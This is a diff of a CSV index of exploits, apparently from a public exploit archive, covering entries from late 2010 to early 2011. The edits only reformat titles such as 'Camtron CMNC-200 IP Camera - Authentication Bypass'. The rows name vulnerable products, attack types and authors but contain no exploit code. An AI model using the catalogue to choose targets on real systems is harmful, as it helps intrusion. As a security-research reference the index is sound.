15466,platforms/php/webapps/15466.txt,"Joomla Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0 15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",multiple,dos,0 @@ -13462,19 +13462,19 @@ id,file,description,date,author,platform,type,port 15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) - LFI",2010-11-09,CoBRa_21,php,webapps,0 15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0 -15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF",2010-11-09,"Fatih Kilic",multiple,webapps,0 -15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow",2010-11-09,"Fatih Kilic",multiple,dos,0 +15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - CSRF",2010-11-09,"Fatih Kilic",multiple,webapps,0 +15474,platforms/multiple/dos/15474.txt,"IBM OmniFind - Buffer Overflow",2010-11-09,"Fatih Kilic",multiple,dos,0 15475,platforms/multiple/local/15475.txt,"IBM OmniFind - Privilege Escalation",2010-11-09,"Fatih Kilic",multiple,local,0 -15476,platforms/multiple/dos/15476.php,"IBM OmniFind Crawler Denial of Service",2010-11-09,"Fatih Kilic",multiple,dos,0 +15476,platforms/multiple/dos/15476.php,"IBM OmniFind Crawler - Denial of Service",2010-11-09,"Fatih Kilic",multiple,dos,0 15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - XSS",2010-11-11,"Philipp Niedziela",php,webapps,0 15480,platforms/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15481,platforms/linux/local/15481.c,"Linux Kernel 2.4.0 - Stack Infoleaks",2010-11-10,"Dan Rosenberg",linux,local,0 15482,platforms/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow",2010-11-10,PoisonCode,windows,dos,0 15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injection",2010-11-10,"Salvatore Fresta",php,webapps,0 -15488,platforms/php/webapps/15488.txt,"Landesk OS command injection",2010-11-11,"Aureliano Calvo",php,webapps,0 +15488,platforms/php/webapps/15488.txt,"Landesk - OS command injection",2010-11-11,"Aureliano Calvo",php,webapps,0 15489,platforms/windows/local/15489.py,"Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH)",2010-11-11,"C4SS!0 G0M3S",windows,local,0 -15491,platforms/osx/dos/15491.txt,"Apple Directory Services Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 +15491,platforms/osx/dos/15491.txt,"Apple Directory Services - Memory Corruption",2010-11-11,"Rodrigo Rubira",osx,dos,0 15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - (.wav) Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection",2010-11-12,Daikin,asp,webapps,0 @@ -13483,9 +13483,9 @@ id,file,description,date,author,platform,type,port 15502,platforms/php/webapps/15502.txt,"Joomla Component com_jsupport - SQL Injection",2010-11-12,Valentin,php,webapps,0 15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0 -15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 -15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 -15508,platforms/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera Denial of Service",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 +15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 +15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 +15508,platforms/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera - Denial of Service",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 @@ -13498,22 +13498,22 @@ id,file,description,date,author,platform,type,port 15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0 15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0 -15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro SQL Injection",2010-11-13,Cru3l.b0y,php,webapps,0 +15526,platforms/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,php,webapps,0 15532,platforms/windows/local/15532.py,"Foxit Reader 4.1.1 - Stack Buffer Overflow Exploit",2010-11-14,sud0,windows,local,0 15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent XSS via Profile Customization",2010-11-16,MaXe,php,webapps,0 -15551,platforms/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 -15552,platforms/asp/webapps/15552.txt,"BPDirectory Business Directory Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 -15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 Exploit",2010-11-14,BraniX,windows,local,0 -15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 Exploit",2010-11-14,BraniX,windows,local,0 -15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 Exploit",2010-11-14,BraniX,windows,local,0 +15551,platforms/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 +15552,platforms/asp/webapps/15552.txt,"BPDirectory Business Directory - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 +15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Exploit",2010-11-14,BraniX,windows,local,0 +15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Exploit",2010-11-14,BraniX,windows,local,0 +15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Exploit",2010-11-14,BraniX,windows,local,0 15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow Exploit (Egghunter Mod)",2010-11-15,dookie,windows,local,0 -15543,platforms/php/webapps/15543.txt,"Chameleon Social Networking Software Persistent XSS",2010-11-15,Dr-mosta,php,webapps,0 +15543,platforms/php/webapps/15543.txt,"Chameleon Social Networking Software - Persistent XSS",2010-11-15,Dr-mosta,php,webapps,0 15544,platforms/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 - Database File Disclosure",2010-11-15,keracker,asp,webapps,0 15545,platforms/php/webapps/15545.txt,"Nuked-Klan Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0 15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0 15549,platforms/php/webapps/15549.txt,"Joomla Component (com_alfurqan15x) - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0 -15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 -15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 +15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 +15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 15555,platforms/php/webapps/15555.txt,"Joomla Maian Media Component (com_maianmedia) - SQL Injection",2010-11-16,v3n0m,php,webapps,0 15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - LFI / XSS",2010-11-16,"SecPod Research",php,webapps,0 15558,platforms/multiple/dos/15558.html,"Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0 @@ -13535,7 +13535,7 @@ id,file,description,date,author,platform,type,port 15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - BoF (users.txt) (EggHunter)",2010-11-19,0v3r,windows,local,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - CSRF Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 15578,platforms/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps,0 -15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow",2010-11-20,LiquidWorm,windows,dos,0 +15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack-based Buffer Overflow",2010-11-20,LiquidWorm,windows,dos,0 15581,platforms/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,windows,dos,0 15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player NKI File Syntactic Analysis Buffer Overflow PoC",2010-11-20,LiquidWorm,windows,dos,0 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0 @@ -13573,7 +13573,7 @@ id,file,description,date,author,platform,type,port 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 - Persistent XSS",2010-11-30,"Shichemt Alen",php,webapps,0 15638,platforms/php/webapps/15638.txt,"Duhok Forum 1.1 - Remote File Upload",2010-11-30,BrOx-Dz,php,webapps,0 15639,platforms/php/webapps/15639.txt,"Pandora Fms 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15640,platforms/php/webapps/15640.txt,"Pandora Fms 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15640,platforms/php/webapps/15640.txt,"Pandora Fms 3.1 - OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15641,platforms/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 15642,platforms/php/webapps/15642.txt,"Pandora Fms 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 @@ -13583,7 +13583,7 @@ id,file,description,date,author,platform,type,port 15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15647,platforms/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution Exploit",2010-12-01,bz1p,windows,remote,0 -15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 +15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - NULL Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15650,platforms/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 - SQL Injection",2010-12-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15651,platforms/php/webapps/15651.txt,"OsCSS 1.2 - Arbitrary File Upload",2010-12-01,"Shichemt Alen",php,webapps,0 15653,platforms/asp/webapps/15653.txt,"bugtracker.net 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",asp,webapps,0 @@ -13607,7 +13607,7 @@ id,file,description,date,author,platform,type,port 15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - (showbrand.aspx) SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 15674,platforms/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - DoS (Metasploit)",2010-12-04,"Vuk Ivanovic",windows,dos,0 15675,platforms/hardware/webapps/15675.txt,"Multiple Linksys Router - CSRF Vulnerabilities",2010-12-04,"Martin Barbella",hardware,webapps,0 -15676,platforms/multiple/dos/15676.txt,"Wireshark LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",multiple,dos,0 +15676,platforms/multiple/dos/15676.txt,"Wireshark - LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",multiple,dos,0 15677,platforms/asp/webapps/15677.txt,"T-Dreams Cars Ads Package 2.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15678,platforms/asp/webapps/15678.txt,"T-Dreams Job Seekers Package 3.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15679,platforms/asp/webapps/15679.txt,"ASPSiteware Recipe Organizer - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 @@ -13651,7 +13651,7 @@ id,file,description,date,author,platform,type,port 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 -15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 +15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0 15803,platforms/windows/dos/15803.py,"Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0 @@ -13664,7 +13664,7 @@ id,file,description,date,author,platform,type,port 15736,platforms/php/webapps/15736.txt,"MantisBT 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,php,webapps,0 15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - LFI (0Day)",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 -15739,platforms/windows/dos/15739.pl,"Easy DVD Creator Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 +15739,platforms/windows/dos/15739.pl,"Easy DVD Creator - Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15740,platforms/php/webapps/15740.txt,"Pointter PHP Content Management System - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15741,platforms/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 @@ -13702,8 +13702,8 @@ id,file,description,date,author,platform,type,port 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent XSS",2010-12-20,Sid3^effects,php,webapps,0 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - LFI",2010-12-20,xer0x,php,webapps,0 -15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET Auth Bypass",2010-12-20,"Sense of Security",asp,webapps,0 -15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional BoF (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0 +15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Auth Bypass",2010-12-20,"Sense of Security",asp,webapps,0 +15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional - BoF (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0 15787,platforms/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0 15788,platforms/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0 @@ -13724,7 +13724,7 @@ id,file,description,date,author,platform,type,port 15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari - (JS .) Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 -15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 +15807,platforms/cgi/webapps/15807.txt,"Mitel AWC - Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - XSS",2010-12-22,clshack,php,webapps,0 15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit (0Day)",2010-12-22,WooYun,windows,remote,0 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass",2010-12-23,"Craig Heffner",hardware,webapps,0 @@ -13737,7 +13737,7 @@ id,file,description,date,author,platform,type,port 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion",2010-12-24,v3n0m,php,webapps,0 15819,platforms/php/webapps/15819.txt,"Joomla Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0 -15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server Denial of Service",2010-12-24,otoy,windows,dos,0 +15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server - Denial of Service",2010-12-24,otoy,windows,dos,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - CSRF (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection / XSS",2010-12-25,"Michael Brooks",php,webapps,0 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 @@ -13791,14 +13791,14 @@ id,file,description,date,author,platform,type,port 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15894,platforms/windows/dos/15894.c,"Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0 -18245,platforms/multiple/remote/18245.py,"Splunk Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 +18245,platforms/multiple/remote/18245.py,"Splunk - Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 -15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0 -15898,platforms/multiple/dos/15898.py,"Wireshark ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 +15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player - Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0 +15898,platforms/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Change Admin Passwd CSRF Exploit",2011-01-04,pentesters.ir,php,webapps,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player SEH BOF",2011-01-04,Acidgen,windows,local,0 -15905,platforms/windows/dos/15905.py,"Xynph 1.0 USER Denial of Service",2011-01-04,freak_out,windows,dos,0 -15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 +15905,platforms/windows/dos/15905.py,"Xynph 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0 +15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusion",2011-01-05,n0n0x,php,webapps,0 15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0 @@ -13845,12 +13845,12 @@ id,file,description,date,author,platform,type,port 15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer stored XSS",2011-01-12,"Saif El-Sherei",php,webapps,0 15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 -15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 +15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0 15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta ",windows,local,0 15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735/1736 - DoS",2011-01-13,"Craig Freyman",windows,dos,0 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 -15988,platforms/windows/dos/15988.py,"Objectivity/DB Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0 +15988,platforms/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0 15989,platforms/php/webapps/15989.txt,"People Joomla Component 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0 15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - CSRF",2011-01-15,Or4nG.M4N,php,webapps,0 @@ -13886,11 +13886,11 @@ id,file,description,date,author,platform,type,port 16027,platforms/php/webapps/16027.txt,"phpcms 9.0 - Blind SQL Injection",2011-01-22,eidelweiss,php,webapps,0 16028,platforms/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",2011-01-22,LiquidWorm,php,webapps,0 16034,platforms/php/webapps/16034.txt,"PHP Coupon Script 6.0 - (bus) Blind SQL Injection",2011-01-23,"BorN To K!LL",php,webapps,0 -16035,platforms/windows/dos/16035.py,"Inetserv 3.23 SMTP Denial of Service",2011-01-23,G13,windows,dos,0 +16035,platforms/windows/dos/16035.py,"Inetserv 3.23 - SMTP Denial of Service",2011-01-23,G13,windows,dos,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit",2011-01-23,"cd1zz and iglesiasgg",windows,remote,0 16037,platforms/php/webapps/16037.html,"PHP Link Directory 4.1.0 - CSRF (Add Admin)",2011-01-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16038,platforms/windows/dos/16038.py,"Inetserv 3.23 POP3 - Denial of Service",2011-01-24,dmnt,windows,dos,0 -16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC",2011-01-25,"Jeremy Brown",windows,dos,0 +16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption PoC",2011-01-25,"Jeremy Brown",windows,dos,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall Root Exploit",2011-01-25,kingcope,multiple,remote,0 16042,platforms/windows/dos/16042.rb,"Opera Web Browser 11.00 - Integer Overflow",2011-01-25,"C4SS!0 G0M3S",windows,dos,0 16060,platforms/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",2011-01-27,"Daniel Godoy",php,webapps,0 @@ -13901,7 +13901,7 @@ id,file,description,date,author,platform,type,port 16050,platforms/php/webapps/16050.txt,"class.upload.php 0.30 - Remote File Upload",2011-01-26,DIES3L,php,webapps,0 16051,platforms/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,php,webapps,0 16052,platforms/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",windows,remote,0 -16053,platforms/windows/remote/16053.txt,"Oracle Document Capture Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 +16053,platforms/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16054,platforms/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",windows,webapps,0 16055,platforms/windows/remote/16055.txt,"Oracle Document Capture - empop3.dll Insecure Methods",2011-01-26,"Evdokimov Dmitriy",windows,remote,0 16056,platforms/windows/remote/16056.txt,"Oracle Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",windows,remote,0 @@ -13911,9 +13911,9 @@ id,file,description,date,author,platform,type,port 16062,platforms/php/webapps/16062.txt,"PHP Classified ads software - (cid) Blind SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Denial of Service (forced reboot)",2011-01-28,kingcope,bsd,dos,0 16069,platforms/php/webapps/16069.txt,"PHP Script Directory Software - (sbcat_id) SQL Injection",2011-01-28,"BorN To K!LL",php,webapps,0 -16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 ASX SEH BOF",2011-01-28,Acidgen,windows,local,0 +16070,platforms/windows/local/16070.py,"Virtuosa Phoenix Edition 5.2 - ASX SEH BOF",2011-01-28,Acidgen,windows,local,0 16071,platforms/windows/local/16071.txt,"Microsoft Internet Explorer - MHTML Protocol Handler XSS",2011-01-29,80vul,windows,local,0 -16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 +16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices - Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - (.m3u) Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0 16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - 